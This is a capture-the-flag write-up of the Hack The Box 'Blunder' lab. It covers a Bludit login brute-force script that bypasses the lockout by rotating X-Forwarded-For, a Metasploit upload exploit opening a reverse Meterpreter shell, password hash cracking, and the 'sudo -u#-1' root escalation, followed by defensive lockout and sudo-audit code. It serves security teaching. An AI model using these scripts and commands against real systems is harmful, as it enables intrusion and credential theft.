HTB: Blunder Writeup 🖥

Tools
Nmap Recon
Dirsearch
Cewl
Python Scripts
Hash identifier and decryptor
Metasploit bludit_upload_images_exec Exploit
Summary of the Blunder Challenge
Nmap scan
Directory fuzzing
Cewl to generate a wordlist
Python script to brute-force the Bludit CMS password, bypassing the brute-force protection
CVE-2019-16113, Bludit - Directory Traversal Image File Upload
Password disclosure
“sudo -u#-1 /bin/bash” one-liner to privesc (sudo security bypass)
Initial Enumeration
Nmap scan of the ports:
nmap -sC -sV -Pn 10.10.10.191

Directory listing, since port 80 is open
Tried directory listing with Dirsearch and got the /admin and /robots directories
python3 dirsearch.py -u http://10.10.10.191 -e *
On fingerprinting, found out it is running Bludit CMS

Further inspection with the SecLists common.txt wordlist:
wfuzz -c -w Downloads/SecLists-master/Discovery/Web-Content/common.txt --hc 404,403 -u "10.10.10.191/FUZZ.txt" -t 100

Further directory listing with wfuzz found /robots.txt and /todo.txt
todo.txt has some juicy stuff
fergus looks like a username, based on the comment

Tried brute-forcing with the common passwords wordlist from SecLists, but no luck this time.
Tried creating a wordlist from the website using Cewl

Now take this password.txt and fire up Burp Intruder 🔥
There seems to be some sort of brute-force protection mechanism implemented.
Googled about it and found an exploit immediately.
There is a protection in place, but a bypass is readily available.
https://rastating.github.io/bludit-brute-force-mitigation-bypass/
After modifying it a bit:
#!/usr/bin/env python3
import re
import requests
#from __future__ import print_function

def open_ressources(file_path):
    # Read the wordlist, one candidate password per line
    return [item.replace("\n", "") for item in open(file_path).readlines()]

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = open_ressources('/home/kali/Desktop/password.txt')

for password in wordlist:
    # Fresh session per attempt so that each login gets its own CSRF token
    session = requests.Session()
    login_page = session.get(login_url)
    csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

    print('[*] Trying: {p}'.format(p = password))

    # The lockout is keyed on X-Forwarded-For, so a new value per attempt never trips it
    headers = {
        'X-Forwarded-For': password,
        'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
        'Referer': login_url
    }

    data = {
        'tokenCSRF': csrf_token,
        'username': username,
        'password': password,
        'save': ''
    }

    login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

    # A successful login redirects to the dashboard instead of back to the login form
    if 'location' in login_result.headers:
        if '/admin/dashboard' in login_result.headers['location']:
            print()
            print('SUCCESS: Password found!')
            print('Use {u}:{p} to login.'.format(u = username, p = password))
            print()
            break
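The mitigation the script above defeats is a per-client lockout keyed on a value the client controls. As an added example, not code from the original post or from Bludit, the following Python models that lockout with the weak key beside a hardened one that only trusts X-Forwarded-For when the connection comes from a known proxy, and replays the rotating-header trick against both. The threshold, proxy ranges, attacking address and wordlist are all assumptions or constructed values.

```python
from collections import defaultdict
from ipaddress import ip_address, ip_network

MAX_FAILURES = 10  # assumption: lock a client key after 10 wrong guesses


def client_ip_weak(peer, headers, trusted_proxies=()):
    # Header-first identity: whatever the client writes into X-Forwarded-For
    # becomes its lockout key, so one attacker looks like a new client per guess.
    return headers.get("X-Forwarded-For", peer)


def client_ip_hardened(peer, headers, trusted_proxies=()):
    # Honour X-Forwarded-For only when the TCP peer is a proxy we operate, and then
    # take the right-most hop (the one that proxy appended); otherwise use the peer.
    if not any(ip_address(peer) in ip_network(p) for p in trusted_proxies):
        return peer
    hops = [h.strip() for h in headers.get("X-Forwarded-For", "").split(",") if h.strip()]
    return hops[-1] if hops else peer


class LoginLimiter:
    def __init__(self, key_fn, trusted_proxies=()):
        self.key_fn = key_fn
        self.trusted_proxies = trusted_proxies
        self.failures = defaultdict(int)

    def attempt(self, peer, headers, password, real_password):
        key = self.key_fn(peer, headers, self.trusted_proxies)
        if self.failures[key] >= MAX_FAILURES:
            return "locked"  # checked before the password, so a locked key cannot succeed
        if password == real_password:
            return "ok"
        self.failures[key] += 1
        return "fail"


def simulate(key_fn, trusted_proxies=()):
    # Replays the script's trick from one attacking address: every guess carries a
    # fresh X-Forwarded-For value. Constructed wordlist with the real password last.
    limiter = LoginLimiter(key_fn, trusted_proxies)
    wordlist = [f"guess{i}" for i in range(40)] + ["RolandDeschain"]
    return [limiter.attempt("10.10.15.49", {"X-Forwarded-For": pw}, pw, "RolandDeschain")
            for pw in wordlist]


if __name__ == "__main__":
    for name, fn in (("weak", client_ip_weak), ("hardened", client_ip_hardened)):
        out = simulate(fn)
        print(f"{name}: {out.count('fail')} failed, {out.count('locked')} locked, last={out[-1]}")
```

Against the weak key the 41st guess succeeds; against the hardened key the attacking address is locked after 10 failures and the correct password is never accepted.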
Got the password for fergus
Use fergus:RolandDeschain to login to the website.

Successfully logged in to the site.

On further googling for exploits I found these:
https://packetstormsecurity.com/files/155295/Bludit-Directory-Traversal-Image-File-Upload.html
https://www.exploit-db.com/exploits/47699
Looks like I'm getting closer to something.
I used msf to get a shell, for easy exploitation.
Spin up Metasploit.
root@kali:/home/kali# msfconsole
=[ metasploit v5.0.81-dev ]
+ -- --=[ 1987 exploits - 1089 auxiliary - 339 post ]
+ -- --=[ 559 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5 > use exploit/linux/http/bludit_upload_images_exec
msf5 exploit(linux/http/bludit_upload_images_exec) > set TARGET 0
TARGET => 0
msf5 exploit(linux/http/bludit_upload_images_exec) > set RHOST 10.10.10.191
RHOST => 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) > set RPORT 80
RPORT => 80
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER fergus
BLUDITUSER => fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS RolandDeschain
BLUDITPASS => RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit
[*] Started reverse TCP handler on 10.10.15.49:4444
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading wLeZlRdQzE.png...
[*] Uploading .htaccess...
[*] Executing wLeZlRdQzE.png...
[*] Sending stage (38288 bytes) to 10.10.10.191
[*] Meterpreter session 1 opened (10.10.15.49:4444 -> 10.10.10.191:50426) at 2020-06-27 06:35:43 -0400
[+] Deleted .htaccess
meterpreter > shell
Process 3053 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@blunder:/$ ls
ls
bin dev home lib64 media proc sbin sys var
boot etc lib libx32 mnt root snap tmp
cdrom ftp lib32 lost+found opt run srv usr
www-data@blunder:/$ cd var/
cd var/
www-data@blunder:/var$ ls
ls
backups crash local log metrics run spool www
cache lib lock mail opt snap tmp
www-data@blunder:/var$ cd www/
cd www/
www-data@blunder:/var/www$ ls
ls
bludit-3.10.0a bludit-3.9.2 html
www-data@blunder:/var/www$ cd bludit-3.10.0a
cd bludit-3.10.0a
www-data@blunder:/var/www/bludit-3.10.0a$ ls
ls
LICENSE bl-content bl-languages bl-themes install.php
README.md bl-kernel bl-plugins index.php
www-data@blunder:/var/www/bludit-3.10.0a$ ls -al
ls -al
total 72
drwxr-xr-x 8 www-data www-data 4096 May 19 15:13 .
drwxr-xr-x 5 root root 4096 Nov 28 2019 ..
drwxr-xr-x 2 www-data www-data 4096 Oct 19 2019 .github
-rw-r--r-- 1 www-data www-data 582 Oct 19 2019 .gitignore
-rw-r--r-- 1 www-data www-data 395 Oct 19 2019 .htaccess
-rw-r--r-- 1 www-data www-data 1083 Oct 19 2019 LICENSE
-rw-r--r-- 1 www-data www-data 2893 Oct 19 2019 README.md
drwxr-xr-x 7 www-data www-data 4096 May 19 10:03 bl-content
drwxr-xr-x 10 www-data www-data 4096 Oct 19 2019 bl-kernel
drwxr-xr-x 2 www-data www-data 4096 Oct 19 2019 bl-languages
drwxr-xr-x 29 www-data www-data 4096 Oct 19 2019 bl-plugins
drwxr-xr-x 5 www-data www-data 4096 Oct 19 2019 bl-themes
-rw-r--r-- 1 www-data www-data 900 May 19 11:27 index.php
-rw-r--r-- 1 www-data www-data 20306 Oct 19 2019 install.php
www-data@blunder:/var/www/bludit-3.10.0a$ cd bl-content
cd bl-content
www-data@blunder:/var/www/bludit-3.10.0a/bl-content$ ls
ls
databases pages tmp uploads workspaces
www-data@blunder:/var/www/bludit-3.10.0a/bl-content$ cd databases
cd databases
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ ls
ls
categories.php plugins site.php tags.php
pages.php security.php syslog.php users.php
Now open users.php
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cat users.php
cat users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}
We got the password hash for the user; let's find out which hash algorithm is being used.
I used hashid to identify the possible hash algorithm.
root@kali:/home/kali# hashid faca404fd5c0a31cf1897b823c695c85cffeb98d
Analyzing 'faca404fd5c0a31cf1897b823c695c85cffeb98d'
[+] SHA-1
[+] Double SHA-1
[+] RIPEMD-160
[+] Haval-160
[+] Tiger-160
[+] HAS-160
[+] LinkedIn
[+] Skein-256(160)
[+] Skein-512(160)
Using https://md5decrypt.net/en/Sha1/ I was able to get the plaintext password.
faca404fd5c0a31cf1897b823c695c85cffeb98d : Password120
Now switch user to hugo and log in with the credentials
www-data@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ su hugo
su hugo
Password: Password120
hugo@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ id
id
uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)
hugo@blunder:/var/www/bludit-3.10.0a/bl-content/databases$ cd
cd
hugo@blunder:~$ ls
ls
Desktop Downloads Pictures Templates Videos
Documents Music Public user.txt
hugo@blunder:~$ cat user.txt
cat user.txt
7c*************************b0
Got the user flag
Let's check the available sudo privileges
hugo@blunder:~$ sudo -l
sudo -l
Password: Password120
Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
hugo@blunder:~$
(ALL, !root) /bin/bash looks interesting
On googling I found
https://www.exploit-db.com/exploits/47502, which is a sudo 1.8.27 - Security Bypass
Root privilege escalation exploit: sudo -u#-1 /bin/bash
hugo@blunder:/$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
root@blunder:/# id
id
uid=0(root) gid=1001(hugo) groups=1001(hugo)
root@blunder:/# ls
ls
bin dev home lib64 media proc sbin sys var
boot etc lib libx32 mnt root snap tmp
cdrom ftp lib32 lost+found opt run srv usr
root@blunder:/# cd root
cd root
root@blunder:/root# ls
ls
root.txt
root@blunder:/root# cat root.txt
cat root.txt
43************************32
root@blunder:/root#
Getting the root flag is that simple.
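The rule itself is the weak point: "!root" excludes the root name and uid 0, but on sudo versions before 1.8.28 a user id given as -1 is not caught by that exclusion and still ends up running as uid 0. As an added example, not from the original post, this Python audit helper parses the output of "sudo -l" and "sudo --version" and flags that combination on a host; the fixed-version threshold is an assumption and the sample text is constructed to mirror the box.

```python
import re

FIXED_VERSION = (1, 8, 28)  # assumption: uid -1 / 4294967295 handling fixed in sudo 1.8.28


def parse_sudo_version(text):
    # Reads the "Sudo version X.Y.Z" line from `sudo --version` output.
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("no sudo version line found")
    return tuple(int(x) for x in m.groups())


def find_negated_root_rules(sudo_l_output):
    # Returns (runas, command) pairs from `sudo -l` output whose run-as list
    # excludes root, e.g. "(ALL, !root) /bin/bash" as on the box.
    rules = []
    for line in sudo_l_output.splitlines():
        m = re.match(r"\s*\((?P<runas>[^)]*)\)\s+(?P<cmd>\S.*)$", line)
        if m and re.search(r"(^|,)\s*!root\b", m.group("runas")):
            rules.append((m.group("runas").strip(), m.group("cmd").strip()))
    return rules


def audit(sudo_l_output, version_text):
    version = parse_sudo_version(version_text)
    label = ".".join(map(str, version))
    findings = []
    for runas, cmd in find_negated_root_rules(sudo_l_output):
        if version < FIXED_VERSION:
            findings.append(f"{cmd}: '({runas})' can be bypassed with a uid of -1 on sudo {label}")
        else:
            findings.append(f"{cmd}: '({runas})' still lets the user run it as any non-root account")
    return findings


# Constructed sample mirroring the box's `sudo -l` output (not a live capture).
SAMPLE_SUDO_L = """Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass
User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE_SUDO_L, "Sudo version 1.8.27"):
        print(finding)
```

Even on a patched sudo the rule remains a finding, because running a shell as any other non-root account is rarely what the administrator intended.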